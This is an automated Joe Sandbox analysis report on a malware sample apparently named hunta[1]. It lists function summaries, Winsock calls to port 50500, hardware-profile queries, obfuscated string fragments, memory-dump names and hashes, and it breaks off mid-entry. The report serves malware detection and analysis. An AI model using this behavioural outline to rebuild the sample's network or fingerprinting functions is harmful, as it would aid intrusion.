Strings

Writ, xrefs: 01431148
WwKLWFk.exe, xrefs: 014311FD, 01431200
Clos, xrefs: 01431129
catA, xrefs: 014311AF
lstr, xrefs: 014311A7
Kern, xrefs: 014310F4
odul, xrefs: 0143122D
athA, xrefs: 01431199
Crea, xrefs: 01431169
WinE, xrefs: 01431110
.dll, xrefs: 01431102
GetT, xrefs: 01431188
el32, xrefs: 014310FB
GetM, xrefs: 014310B6
dleA, xrefs: 014310D0

Memory Dump Source

Source File: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd

Yara matches

Similarity

API ID: File$ChangeCloseCreateExecFindNotificationWrite
String ID: .dll$Clos$Crea$GetM$GetT$Kern$WinE$Writ$WwKLWFk.exe$athA$catA$dleA$el32$lstr$odul
API String ID: 2234911746-1035807574
Opcode ID: 427073a4ef8cdd273e52de3960116424fab24a684a798692c956fdf8c3eeff39
Instruction ID: 2e3781faf35d3ef84e58d02f9f1e922f4b611042d24c1e318ac52093f0cf5c55
Opcode Fuzzy Hash: 427073a4ef8cdd273e52de3960116424fab24a684a798692c956fdf8c3eeff39
Instruction Fuzzy Hash: 2C611975D012159BCF25CF98C884AEEFBB0BB8CB15F14826BD505A7321C7709A81CB95

Function 00E9DB60 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 99
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32 ref: 00E9DB8B
socket.WS2_32(?,?,?,?,?,?,50500,?,?), ref: 00E9DC2D
connect.WS2_32(00000000,?,?,?,?,?,50500,?,?), ref: 00E9DC41
closesocket.WS2_32(00000000), ref: 00E9DC4D

Strings

50500, xrefs: 00E9DBE8

Memory Dump Source

Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd

Yara matches

Similarity

API ID: Startupclosesocketconnectsocket
String ID: 50500
API String ID: 3098855095-2230786414
Opcode ID: 983f1cfdb41abde6b824678953e2cfdaca2026b49a4d02cbf7f4486641137ea5
Instruction ID: 5d3696a90d7410c58d479641f6a5a8e9cad631f2a93e1ed03c2ee1953aa7a625
Opcode Fuzzy Hash: 983f1cfdb41abde6b824678953e2cfdaca2026b49a4d02cbf7f4486641137ea5
Instruction Fuzzy Hash: A931C4715093156BCA209B288C85B6BF7E5FFC9738F112B19F9A8A31D0E370A8048692

Function 059B056A Relevance: 1.8, APIs: 1, Instructions: 348
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 059B07F7

Memory Dump Source

Source File: 00000002.00000002.3744948935.00000000059B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_59b0000_hunta[1].jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 7fada92473ace338daa87fc03698fcbbbcbbbbc48f556f30f8551e7558de7ec3
Instruction ID: a82ca0559196b4e6ce0c5e294c707f1323669e1fe2807c8801c452ba274bb442
Opcode Fuzzy Hash: 7fada92473ace338daa87fc03698fcbbbcbbbbc48f556f30f8551e7558de7ec3
Instruction Fuzzy Hash: 7561A0EB14C111FDB102C1826B9CAFBAB6FE6D67707308D66F407D6A02E3D44B895532

Function 059B07B1 Relevance: 1.8, APIs: 1, Instructions: 260COMMON

Download Yara Rule

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 059B07F7

Memory Dump Source

Source File: 00000002.00000002.3744948935.00000000059B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_59b0000_hunta[1].jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 61c183259b93884bcfa47a0767191a5a905a6007295b620a572094c65bcaf61a
Instruction ID: 85298f52e5f4e7e319a4a9a24c62a16a8b3499d10145e28642cf1f9fb8c3a62a
Opcode Fuzzy Hash: 61c183259b93884bcfa47a0767191a5a905a6007295b620a572094c65bcaf61a
Instruction Fuzzy Hash: BC417DEB54D121BCB112C5912BACAFB6B6FE6D77303308C66F407D6906E3D84B8A5171

Function 00E9EC20 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 265
networksleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

setsockopt.WS2_32(0000037C,0000FFFF,00001006,?,00000008), ref: 00E9ECC7
recv.WS2_32(?,00000004,00000002), ref: 00E9ECE1
recv.WS2_32(00000000,0000000C,00000002,0000000C), ref: 00E9ED4E
recv.WS2_32(00000000,0000000C,00000008), ref: 00E9ED6F
recv.WS2_32(00000000,?,00000008), ref: 00E9EE0C

Part of subcall function 00E9DB60: WSAStartup.WS2_32 ref: 00E9DB8B
Part of subcall function 00E9DB60: socket.WS2_32(?,?,?,?,?,?,50500,?,?), ref: 00E9DC2D
Part of subcall function 00E9DB60: connect.WS2_32(00000000,?,?,?,?,?,50500,?,?), ref: 00E9DC41
Part of subcall function 00E9DB60: closesocket.WS2_32(00000000), ref: 00E9DC4D

recv.WS2_32(?,00000004,00000008), ref: 00E9F033
Sleep.KERNELBASE(00000001), ref: 00E9F09E
Sleep.KERNELBASE(00000064), ref: 00E9F0AC
__Mtx_unlock.LIBCPMT ref: 00E9F211

Strings

50500, xrefs: 00E9EC75

Memory Dump Source

Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd

Yara matches

Similarity

API ID: recv$Sleep$Mtx_unlockStartupclosesocketconnectsetsockoptsocket
String ID: 50500
API String ID: 2930922264-2230786414
Opcode ID: 3220bf851cab40ca656752feb9b7fe662b457098c6e57f8964c7c56e06a73dfa
Instruction ID: f2f7ae08472281b050ade4911c3efe2141b6650b5702cbc76aba9fc5fc08b15c
Opcode Fuzzy Hash: 3220bf851cab40ca656752feb9b7fe662b457098c6e57f8964c7c56e06a73dfa
Instruction Fuzzy Hash: 7CB1AC31D00248DFEF24DBA8CC85BADBBB5FB45314F648369E444B7292D774A9858F90

Function 00E9E060 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 333
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSASend.WS2_32(?,?,00000001,00000000,00000000,00000000,00000000,?,?,?,?,00F84438,00000000,00000000,-00FB65B0), ref: 00E9E3A6

Strings

131, xrefs: 00E9F2C8
50500, xrefs: 00E9EC75
Ws2_32.dll, xrefs: 00E9E37D

Memory Dump Source

Source File: 00000002.00000002.3728817145.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000002.00000002.3728519882.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3728817145.0000000000FB3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729603023.0000000000FB7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001268000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3729736991.000000000127F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733262566.0000000001280000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733889474.000000000142D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3733969884.000000000142E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734043665.0000000001431000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3734118369.0000000001432000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e80000_hunta[1].jbxd

Yara matches

Similarity

API ID: Send
String ID: 131$50500$Ws2_32.dll
API String ID: 121738739-3512819870
Opcode ID: d606e65e1e44160b9dfef8c4133a13068b9c966dac467be5f9b8ece88cd9e711
Instruction ID: 42fbc8a77bf0656328b4ad5b5ab199a7120f24a7b289c7170161e9ae3699fa29
Opcode Fuzzy Hash: d606e65e1e44160b9dfef8c4133a13068b9c966dac467be5f9b8ece88cd9e711
Instruction Fuzzy Hash: 8CD1DE31A04248DFDF18CFA8CC51BEDBBF1AF06314F684258D955BB292E7709886CB91

Function 059B0573 Relevance: 1.8, APIs: 1, Instructions: 350
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 059B07F7

Memory Dump Source

Source File: 00000002.00000002.3744948935.00000000059B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_59b0000_hunta[1].jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 1779de93eeb7398281cbfdeb0e8cd37eadc253443ac77cba179b1292aa31e308
Instruction ID: e051512c5d25e1d976c57fdd8c8b6213974a5b65c921c1bddf0472bb10f0e070
Opcode Fuzzy Hash: 1779de93eeb7398281cbfdeb0e8cd37eadc253443ac77cba179b1292aa31e308
Instruction Fuzzy Hash: D661BFEB54C111FDB202D1926B9CAFBAB6FE6D67707308C66F407D6902E3D84B891132

Function 059B05C5 Relevance: 1.8, APIs: 1, Instructions: 337
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 059B07F7

Memory Dump Source

Source File: 00000002.00000002.3744948935.00000000059B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_59b0000_hunta[1].jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 702301de202712047281c3325d116e65ed26ee6a69703b0082e8a58e5fd1968f
Instruction ID: 78572aae8ba8e0667f1ef71afffc6e244a195d3fa2d8de7c321d07a7f1485615
Opcode Fuzzy Hash: 702301de202712047281c3325d116e65ed26ee6a69703b0082e8a58e5fd1968f
Instruction Fuzzy Hash: 65619EEB14D110BDB202C5826FACAFBA76FE6D67307308C6AF407D6502E3D44B895536

Function 059B05B3 Relevance: 1.8, APIs: 1, Instructions: 334
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 059B07F7

Memory Dump Source

Source File: 00000002.00000002.3744948935.00000000059B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_59b0000_hunta[1].jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: fa2e049ff72a08ad5acaffcbc704db0ba3bdc9e6f364c864638d9bddc46573bf
Instruction ID: 274899f6c633c4ac30ce37484c6221837d86e55a2094ac68c9bfd32fd3ee21aa
Opcode Fuzzy Hash: fa2e049ff72a08ad5acaffcbc704db0ba3bdc9e6f364c864638d9bddc46573bf
Instruction Fuzzy Hash: B361AEEB14C111BDB102C5866FACAFBA76FE6D67307308D66F40BD6502E3D84B891536

Function 059B0679 Relevance: 1.8, APIs: 1, Instructions: 323
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 059B07F7

Memory Dump Source

Source File: 00000002.00000002.3744948935.00000000059B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_59b0000_hunta[1].jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: efd5b34b65a14609660ba6e995bee83e878dca7231dab19cc1fd56a7a055f7db
Instruction ID: 5c9656e488ee60ffe11688e3ca30be3df7079fa24e044ea5e33bf826ac2a2b75
Opcode Fuzzy Hash: efd5b34b65a14609660ba6e995bee83e878dca7231dab19cc1fd56a7a055f7db
Instruction Fuzzy Hash: 8B51D0EB64D110BDB202C5926F9CAFB6B2FE6D27307308C66F407D6506E3D84E8A5172

Function 059B05A9 Relevance: 1.8, APIs: 1, Instructions: 316
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 059B07F7

Memory Dump Source

Source File: 00000002.00000002.3744948935.00000000059B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_59b0000_hunta[1].jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 461140f42775da96b9179f03cfbd4914c6eb935a892f88e13880b4e021cde9a2
Instruction ID: 1a76fdf2ad46bdda2b5d16a1b02d82d4d65b7ea4445b488bb92a8a4a4d918f48
Opcode Fuzzy Hash: 461140f42775da96b9179f03cfbd4914c6eb935a892f88e13880b4e021cde9a2
Instruction Fuzzy Hash: A7519FEB14D110BDB202C5926BACAFBA76FE6D67307308C67F407D6506E3D84B891176

Function 059B05FD Relevance: 1.8, APIs: 1, Instructions: 314
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 059B07F7

Memory Dump Source

Source File: 00000002.00000002.3744948935.00000000059B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_59b0000_hunta[1].jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: c683d1a51dc16a09b6b5a8211e7430a681930f84fba5d05d34ecb5838d2b49a4
Instruction ID: 8383667d60e2bf82ae57bc5e024624ca7d638eb28cc8cdee1551d7f7c3872084
Opcode Fuzzy Hash: c683d1a51dc16a09b6b5a8211e7430a681930f84fba5d05d34ecb5838d2b49a4
Instruction Fuzzy Hash: 1B51BFEB54C110BDB102C5826FACAFBA76FE6C67307308C66F407D6506E3D84B891536

Function 059B0615 Relevance: 1.8, APIs: 1, Instructions: 309
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 059B07F7

Memory Dump Source

Source File: 00000002.00000002.3744948935.00000000059B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_59b0000_hunta[1].jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 43939f311c3fa0581916075cfb2dfa986c8d885c3f987a44214c3ac82fb43323
Instruction ID: fc33240381ccd4ccb42603ca6a325bf3ac930ca1769ae4f56c59c0e2e899ae5a
Opcode Fuzzy Hash: 43939f311c3fa0581916075cfb2dfa986c8d885c3f987a44214c3ac82fb43323
Instruction Fuzzy Hash: D9519EEB64C110BDB102C1826FACAFB976FE6D67707308D66F407D6506E3D84B8A1532

Function 059B063E Relevance: 1.8, APIs: 1, Instructions: 306
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 059B07F7

Memory Dump Source

Source File: 00000002.00000002.3744948935.00000000059B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_59b0000_hunta[1].jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 454ef1efd1570499a4deaf6d614ceb722cfdcbb2a8ab9d5c4a5848969fa519e4
Instruction ID: c7cb6a25556d0dd342aa1b913083a3b449bf102610b8710fcfc50d12c79da5bc
Opcode Fuzzy Hash: 454ef1efd1570499a4deaf6d614ceb722cfdcbb2a8ab9d5c4a5848969fa519e4
Instruction Fuzzy Hash: 59519CEB64D110BDB102C1926FACAFB9B2FE6C67707308C66F407D6506E3D84B8A1572

Function 059B0626 Relevance: 1.8, APIs: 1, Instructions: 303
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 059B07F7

Memory Dump Source

Source File: 00000002.00000002.3744948935.00000000059B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_59b0000_hunta[1].jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 67595672bf9ca37645f4eada93ffe3d3ab50716105cf389d343695712b7b48a0
Instruction ID: 389bbdf649023177c8cfcc4cf381691fb9696f93a9391f7407e4a7841b4fc0a2
Opcode Fuzzy Hash: 67595672bf9ca37645f4eada93ffe3d3ab50716105cf389d343695712b7b48a0
Instruction Fuzzy Hash: AB51ACEB54D110BDB202C1926F9CAFBAB6FE6C67307308C66F407D6502E3D84B8A1572

Function 059B066A Relevance: 1.8, APIs: 1, Instructions: 289
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 059B07F7

Memory Dump Source

Source File: 00000002.00000002.3744948935.00000000059B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_59b0000_hunta[1].jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: f28a34c495eb518d1082d28f1f80fdd441693f0681e619fec1bd07dd8e6be69c
Instruction ID: a8511625435a803b3944b11ab4fa1b2d38f6fd11a7158ca63423eedef2635af1
Opcode Fuzzy Hash: f28a34c495eb518d1082d28f1f80fdd441693f0681e619fec1bd07dd8e6be69c
Instruction Fuzzy Hash: C151ADEB64C110BCB102C5926FACAFB976FE6D67707308C26F407D5906E3D84B8A1532

Function 059B06BA Relevance: 1.8, APIs: 1, Instructions: 283COMMON

Download Yara Rule

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 059B07F7

Memory Dump Source

Source File: 00000002.00000002.3744948935.00000000059B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_59b0000_hunta[1].jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 6177fbaf9f7e62cd1c9769952d3c20ba14279b66371e3ea16250b7d253fd4cbc
Instruction ID: 55b9f0bad268d6fbce1d4d5ee4b5d7aaf38fc5e9a76bc4c0df9e9333cd896d11
Opcode Fuzzy Hash: 6177fbaf9f7e62cd1c9769952d3c20ba14279b66371e3ea16250b7d253fd4cbc
Instruction Fuzzy Hash: 65519EEB64C111BDB212C1912F9CAFBA76FE6C67707308836F407D6506E3D84B8A1571

Function 059B06A4 Relevance: 1.8, APIs: 1, Instructions: 282COMMON

Download Yara Rule

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 059B07F7

Memory Dump Source

Source File: 00000002.00000002.3744948935.00000000059B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_59b0000_hunta[1].jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 2826e90f785c6a72fe536453682b421c291fe8496fefeaed15b7f2f4b7e95f9b
Instruction ID: afe69c6af9dc0eb90a22ee78d45f51c0d236d01e9d974d7cf0b9c5d5a72b6cbf
Opcode Fuzzy Hash: 2826e90f785c6a72fe536453682b421c291fe8496fefeaed15b7f2f4b7e95f9b
Instruction Fuzzy Hash: 01516BEB64D111BCB112C1912BACAFB976FE6C67707308C76F407D5906E3D84B8A1571

Function 059B06E2 Relevance: 1.8, APIs: 1, Instructions: 275COMMON

Download Yara Rule

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 059B07F7

Memory Dump Source

Source File: 00000002.00000002.3744948935.00000000059B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_59b0000_hunta[1].jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 4857ae60c07d5099e549ce7bf3ed479cdf5f8b46acbb0f700b9578c5da1cd735
Instruction ID: d7b3221821fa7fd6884dac3b9cbb0feafaa6f064c9cc34a4587430a52d585196
Opcode Fuzzy Hash: 4857ae60c07d5099e549ce7bf3ed479cdf5f8b46acbb0f700b9578c5da1cd735
Instruction Fuzzy Hash: BB516AEB64D111BCB102C1912FACAFB976FE6C67707308866F40BD6906E3D84B8A1572

Function 059B0707 Relevance: 1.8, APIs: 1, Instructions: 274COMMON

Download Yara Rule

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 059B07F7

Memory Dump Source

Source File: 00000002.00000002.3744948935.00000000059B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_59b0000_hunta[1].jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: e9c181b267d03a5d493cab5a637cf9249d3255c66198e7d63b0187e25b0e670f
Instruction ID: 9c1346a81354f219658ffcf071e16a7f38f25bfe2fda312e7f385dde35497720
Opcode Fuzzy Hash: e9c181b267d03a5d493cab5a637cf9249d3255c66198e7d63b0187e25b0e670f
Instruction Fuzzy Hash: 75518BEB54D111BCB102C1922FACAFB9B6FE6C67307308C26F407D6506E3D84B8A6472

Function 059B0788 Relevance: 1.8, APIs: 1, Instructions: 271COMMON

Download Yara Rule

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 059B07F7

Memory Dump Source

Source File: 00000002.00000002.3744948935.00000000059B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_59b0000_hunta[1].jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 0ea5228a8472770be39bbcd87442c12b4e80335f0dfcd92c9be74d2eb944fbcb
Instruction ID: ed0df1ddd8fe53998ea337b0ef28c9b989226e60075a6ec1878e4fc26eb0164b
Opcode Fuzzy Hash: 0ea5228a8472770be39bbcd87442c12b4e80335f0dfcd92c9be74d2eb944fbcb
Instruction Fuzzy Hash: B3517CEB64D111BCB102C1912FACAFB9B6FE6C67307308836F407D5906E3D84B8A6571

Function 059B06FE Relevance: 1.8, APIs: 1, Instructions: 270COMMON

Download Yara Rule

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 059B07F7

Memory Dump Source

Source File: 00000002.00000002.3744948935.00000000059B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_59b0000_hunta[1].jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 706c06ee60d502c263ed91f420422842e92a89b1facc2f4994d7dee589265ede
Instruction ID: bf870632cb09e7b0ac235a01b6aee2f0113a6ddde772b35d61da8b5f5e800dfc
Opcode Fuzzy Hash: 706c06ee60d502c263ed91f420422842e92a89b1facc2f4994d7dee589265ede
Instruction Fuzzy Hash: B0516AEB64D111BCB102C1812FACAFB976FE6C67307308866F407D6906E3D84F8A2571

Function 059B0735 Relevance: 1.8, APIs: 1, Instructions: 266COMMON

Download Yara Rule

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 059B07F7

Memory Dump Source

Source File: 00000002.00000002.3744948935.00000000059B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_59b0000_hunta[1].jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: c468fda6c11036c9e728f0bf62ca85ab917a7ad142ec1689fe76102fc1f3e98f
Instruction ID: 8189873c61e0c92d4c54d39605d65e41651642c2aaef465846db2ee7c8316d3f
Opcode Fuzzy Hash: c468fda6c11036c9e728f0bf62ca85ab917a7ad142ec1689fe76102fc1f3e98f
Instruction Fuzzy Hash: 4F517BEB64D125BCB102D5812FACAFB976FE6C67307308836F407D5906E3D84B8A5171

Function 059B0725 Relevance: 1.8, APIs: 1, Instructions: 265COMMON

Download Yara Rule

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 059B07F7

Memory Dump Source

Source File: 00000002.00000002.3744948935.00000000059B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_59b0000_hunta[1].jbxd

Similarity

API ID: CurrentProfile
String ID:
